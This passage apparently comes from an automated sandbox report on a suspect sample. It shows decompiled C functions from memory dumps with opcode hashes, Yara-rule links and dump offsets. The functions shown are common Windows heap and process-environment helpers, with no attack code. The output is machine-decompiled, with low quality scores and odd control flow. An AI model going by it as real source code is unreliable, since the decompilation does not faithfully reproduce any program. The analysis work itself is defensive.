Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 45E065326405407BD7159E55DC85B5776599F82721F044079BA045E243C6E9DD0D97A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00FE8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x100d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00F37D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00fe8ce5
0x00fe8ced
0x00fe8cf0
0x00fe8cfb
0x00fe8d0d
0x00fe8cfd
0x00fe8d06
0x00fe8d06
0x00fe8d18
0x00fe8d19
0x00fe8d1b
0x00fe8d20
0x00fe8d33

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a1f83af9b0fd765250f6589766cb0701b940e188bcf3f05985a712a3c13449
Instruction ID: b7d4bf8754fc14785d4cc989469f58d40e0529cf0e96bdc977b52b53577b5180
Opcode Fuzzy Hash: e9a1f83af9b0fd765250f6589766cb0701b940e188bcf3f05985a712a3c13449
Instruction Fuzzy Hash: 5CF08270A04648AFCB14EBA9ED46E6E77B4EF08310F104199F915EB2C1EA38D904D754

Uniqueness

Uniqueness Score: -1.00%

Function 00F3746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F3746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00F2EB70(__ecx, 0x10079a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00F595D0();
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x00f3746d
0x00f3746d
0x00f3746d
0x00f37471
0x00f37488
0x00f7f92d
0x00f3748e
0x00f37491
0x00f37495
0x00f7f937
0x00f7f93a
0x00f7f94e
0x00f7f953
0x00f7f956
0x00f7f956
0x00f37495
0x00000000
0x00f37488
0x00f37473
0x00f37478
0x00f3747d
0x00f37481
0x00000000
0x00f37481
0x00f3747d
0x00f3747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddaf5bf9716828548b0106047e980bb9695af514402576b59675a8d34663fba
Instruction ID: 6e4ecfd20a0fcc4315e1039cafb6a1fc84ce7ad4014de3690f41e4179788a553
Opcode Fuzzy Hash: eddaf5bf9716828548b0106047e980bb9695af514402576b59675a8d34663fba
Instruction Fuzzy Hash: 5EF0B475908384EADF21F768C840B7DBBB1AF04330F144115E9A1AB161F769AC00B786

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00FE8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x100d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00F37D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00F5B640(E00F59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00fe8b67
0x00fe8b6f
0x00fe8b72
0x00fe8b7d
0x00fe8b8f
0x00fe8b7f
0x00fe8b88
0x00fe8b88
0x00fe8b9a
0x00fe8b9b
0x00fe8b9d
0x00fe8ba2
0x00fe8bb5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566d9e30554b750ce4fc268b07900c99168c6bf835a2906322b271b6ad48c71e
Instruction ID: 803d7687b643a05d62b752b1cb8348e4a1c6ea858fa0a73c8e0ded1ce714b972
Opcode Fuzzy Hash: 566d9e30554b750ce4fc268b07900c99168c6bf835a2906322b271b6ad48c71e
Instruction Fuzzy Hash: E8F082B0A04298ABDB14FBA9D906E6E73B4EF44310F140499BE05DB391EB78D900D794

Uniqueness

Uniqueness Score: -1.00%

Function 00F14F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F14F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E00FE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00F3C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xef1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x00f14f2e
0x00f14f34
0x00f14f38
0x00f70b85
0x00f70b85
0x00f70b89
0x00f70b9a
0x00f70b9a
0x00f70b9f
0x00000000
0x00f70b9f
0x00f70b94
0x00f70b98
0x00000000
0x00000000
0x00000000
0x00f70b98
0x00f14f3e
0x00f14f48
0x00000000
0x00f14f6e
0x00000000
0x00f14f70

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3342b77bfadb23173a319936245a70a1555801d7010c962db2d0a2ef934ac1fe
Instruction ID: 62e88b746e9d81f84e7d593f5e4a058f3cefe11d4c1d02fe5cf46cb40f9289f9
Opcode Fuzzy Hash: 3342b77bfadb23173a319936245a70a1555801d7010c962db2d0a2ef934ac1fe
Instruction Fuzzy Hash: 9DF0BE32921688CFD760D71CC584F22B7D4AF807B8F449466D409C7A61CF28EE80E681

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1007b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00F5FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x00f4a44b
0x00f4a453
0x00f4a472
0x00f4a476
0x00000000
0x00f4a493
0x00f4a47a
0x00f4a47f
0x00f4a486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7a2ca0fd80a84075b2e34a8caa812da8a8bc0c4dd66109798e103cbbe1005f
Instruction ID: 84facc2888483761f609f6a6eec63f5ba210cd1e6d173c2ff4b546c1ef1e015c
Opcode Fuzzy Hash: 6e7a2ca0fd80a84075b2e34a8caa812da8a8bc0c4dd66109798e103cbbe1005f
Instruction Fuzzy Hash: 26E02272A41820ABD2228F18AC01F6AB79DDBD0B11F090034FA04C7220C66CED01D3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F1F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F1F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00F4F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00F34620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x00f1f35d
0x00f1f361
0x00f1f367
0x00f1f372
0x00f1f38c
0x00f1f38c
0x00f1f394

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: efc8308631cce11f7a8218feeb86f49f7a5218908a784c06ae68a566e733e77a
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 97E0D832A40118BBCB219AD99D06FAABBACDB44B60F000165B904D7150D565AD40E2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F2FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xef11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E00FE88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00F30050(_t14);
				}
			}

0x00f2ff66
0x00f2ff6b
0x00000000
0x00f2ff8f
0x00000000
0x00f2ff8f

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7aaa01e3658f91111ff81279ddad0037e6991041ad99ba4fa0102dee4e43e1
Instruction ID: 5daa1629c6d1f8dbb37db985d18ca1941bdffd25a24f13219961b1727368c528
Opcode Fuzzy Hash: 0b7aaa01e3658f91111ff81279ddad0037e6991041ad99ba4fa0102dee4e43e1
Instruction Fuzzy Hash: 99E0DFB1A29258DFD734DB52E360F2537B8AB62731F19827EF8084B102CA25DC85E206

Uniqueness

Uniqueness Score: -1.00%

Function 00FA41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00FA41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xff08f0);
				_t5 = E00F6D08C(__ebx, __edi, __esi);
				if( *0x10087ec == 0) {
					E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x10087ec == 0) {
						 *0x10087f0 = 0x10087ec;
						 *0x10087ec = 0x10087ec;
						 *0x10087e8 = 0x10087e4;
						 *0x10087e4 = 0x10087e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00FA4248();
				}
				return E00F6D0D1(_t5);
			}

0x00fa41e8
0x00fa41ea
0x00fa41ef
0x00fa41fb
0x00fa4206
0x00fa420b
0x00fa4216
0x00fa421d
0x00fa4222
0x00fa422c
0x00fa4231
0x00fa4231
0x00fa4236
0x00fa423d
0x00fa423d
0x00fa4247

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9344361faf4957a3981b55b5da2869ddf2dc3ada162ebe0f75e726fc25ac70
Instruction ID: de9760b4dbfcf9072ba26b4f9b73053218e85e277c0668454e8bab7253e074c0
Opcode Fuzzy Hash: 6e9344361faf4957a3981b55b5da2869ddf2dc3ada162ebe0f75e726fc25ac70
Instruction Fuzzy Hash: 15F015B8D10700DEDBB2EFA8D90171436E4F788321F1081ABA1888728EC77D94A0EF05

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00F1E8B0(__ecx, _a4, 0xfff);
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x00fcd38a
0x00fcd39b
0x00fcd3b1
0x00000000
0x00fcd3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 8746d967327efb3fce970e75d0ec8de255598ac831428a9a59442beede848a0f
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: A2E0C232285289BBDB226E44CD02FA9BB16DB507B0F204035FE085A691C6759C91F6C4

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x10067e4 >= 0xa) {
					if(_t5 < 0x1006800 || _t5 >= 0x1006900) {
						return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00F30010(0x10067e0, _t5);
				}
			}

0x00f4a190
0x00f4a1a6
0x00f4a1c2
0x00000000
0x00000000
0x00000000
0x00f4a192
0x00f4a192
0x00f4a19f
0x00f4a19f

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eda93a67f0d8ade13ef18b06cbfe8c4649b138ff9e929c916112f731851dfee
Instruction ID: 4edf1f3b5c2cea074fe86143514437dbb1fb24e65caa0b0e6b07fea80d44abaf
Opcode Fuzzy Hash: 8eda93a67f0d8ade13ef18b06cbfe8c4649b138ff9e929c916112f731851dfee
Instruction Fuzzy Hash: 54D05EB11A10405AFA2E6710DD65B253657F7C8720F30484EF18B4A9E5EEAA88F4F60A

Uniqueness

Uniqueness Score: -1.00%

Function 00F416E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F416E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00F41710(0x10067e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00F34620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x00f416e8
0x00f416ef
0x00f416f3
0x00f416fe
0x00000000
0x00f41700
0x00f4170d
0x00f4170d
0x00f416f2
0x00f416f2
0x00f416f2
0x00f416f2

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0888c472b0cc87f7eff01f9acad39bc1016ce3f98ded5c0c84f98d800dda3ca4
Instruction ID: 105cbf4edbabb1a92847f5c418afdd351c190ebcb33006643d18bd95e56acb45
Opcode Fuzzy Hash: 0888c472b0cc87f7eff01f9acad39bc1016ce3f98ded5c0c84f98d800dda3ca4
Instruction Fuzzy Hash: 96D0A73110010052EA2D5B149C05B143652FB807A1F38005CF50B494C1DFA5DCE2F448

Uniqueness

Uniqueness Score: -1.00%

Function 00F953CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F953CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00F2EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x00f953ca
0x00f953ce
0x00f953d9
0x00f953de
0x00f953e1
0x00f953e1
0x00f953e6
0x00f953f3
0x00000000
0x00f953f8
0x00f953fb

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 056d89928ea689d0e50f7deab2724dfe405376eb599d0b1096ca7e52f6ac0ee3
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: ADE0EC72944B849BDF13EB59CA50F5EB7F6FB84B50F150454B4085B661C668ED00DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00417D70, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5965ff1bff87cc1096ef512adcd51672d866ddefb65cd8dd67137310bfc7f5
Instruction ID: 760c2aa2da851f852a9bec609889ba5f06550f522b223204090a29af678f7db9
Opcode Fuzzy Hash: cd5965ff1bff87cc1096ef512adcd51672d866ddefb65cd8dd67137310bfc7f5
Instruction Fuzzy Hash: 28C09B16F874158515149D9D34410B4F379E9E7465F547277CD1CF31041907C41184DF

Uniqueness

Uniqueness Score: -1.00%

Function 00F435A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F435A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00F2EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x00f435a1
0x00f435a1
0x00f435a5
0x00f435ab
0x00f435ab
0x00f435b5
0x00000000
0x00f435c1
0x00f435b7

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 38addcd6fa4b2bc3a851825ee0f82e286737b80f9f8b2d4877da7b65acc3cc9f
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: A0D0C9329511869ADB51BB50D6187687BB2BB00328F6C2065984646966C33A4F5AF603

Uniqueness

Uniqueness Score: -1.00%

Function 00F2AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F2AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x00f2aab6
0x00f2aabb
0x00f7a442
0x00000000
0x00f7a448
0x00f7a454
0x00f7a454
0x00f2aac1
0x00f2aac1
0x00f2aac6
0x00f2aac6

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 99ed80194b4d551462ddcfc06d07b5b09d99458d83a51fa5ce2158b3d899a77c
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 49D0C935352D80CFD616CF0CC554B0533A4BB44B40FC50490E400CB721E62CDD44CA01

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F9A537(intOrPtr _a4, intOrPtr _a8) {

				return L00F38E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x00f9a553

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 5a7ca73eed916b1bba507c3416257b28bed090dd024f5da93511f2f2b7ad6fea
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 30C01232040248BBCB126E81CC01F057F2AE754760F004010B5040A5618536D971E644

Uniqueness

Uniqueness Score: -1.00%

Function 00F1DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F1DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00F34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x00f1db4d
0x00f1db54
0x00f1db5f
0x00f1db56
0x00f1db56
0x00f1db5c
0x00f1db5c

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 2d2ecba93288bb3902f32599400fb1a77ddaf2e0aaf11c71a0eddf2962ecc654
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 27C08C30280A00AAEB225F20CD02B4076A0BB41B01F4500A07301DA0F1DB7CEC02FA00

Uniqueness

Uniqueness Score: -1.00%

Function 00F1AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F1AD30(intOrPtr _a4) {

				return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00f1ad49

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: a7012d2ef81c2d306a717d4f0ce74a52428d264d8d773309d613b0d1e3430d75
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: FDC08C32080288BBC7226A45CD01F017B29E790B60F000020B6040A6628936E860E588

Uniqueness

Uniqueness Score: -1.00%

Function 00F276E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F276E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x00f276e4
0x00000000
0x00f276f8
0x00f276fd

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 7ed78a44c8b4547cdcf01c1089a4eedb2fd43bc776bfa81293987f24dc835fab
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: A7C08CB0549BC85AEB2A7709CE21B203A50EB08728F48019CBA02094A2C36CAC02E208

Uniqueness

Uniqueness Score: -1.00%

Function 00F436CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F436CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x00f436d2
0x00f436e8
0x00f436d4
0x00f436e5
0x00f436e5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: f1d72f9b47bb936ff54b0daf3c53a9cd00c150d01e5b0489829f98d09919c590
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 1FC02B70150840BBE7152F30CD03F14B254F700B31F6403547220454F0D52CBC00F100

Uniqueness

Uniqueness Score: -1.00%

Function 00F33A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F33A1C(intOrPtr _a4) {
				void* _t5;

				return L00F34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00f33a35

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 667e6541bb9d97bd27061b44f2848cc4133eb55d97de7d7aa9be53a7fe44e51d
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: EDC04C32180648BBC7126E45DD02F15BB69E795B60F154021B6040A5618576FD61E598

Uniqueness

Uniqueness Score: -1.00%

Function 00F37D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F37D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x00f37d56
0x00f37d5b
0x00f37d60
0x00f37d5d
0x00f37d5d
0x00f37d5d

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 99633da719d18cc4959a3d6c495a673c892be89fffeaf9733382d1febd210bf7
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: F5B09234301A408FCE26EF18C080B1533E4BB44B60F8400D0E800CBA20D329E8009900

Uniqueness

Uniqueness Score: -1.00%

Function 00F42ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F42ACB() {
				void* _t5;

				return E00F2EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x00f42adc

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
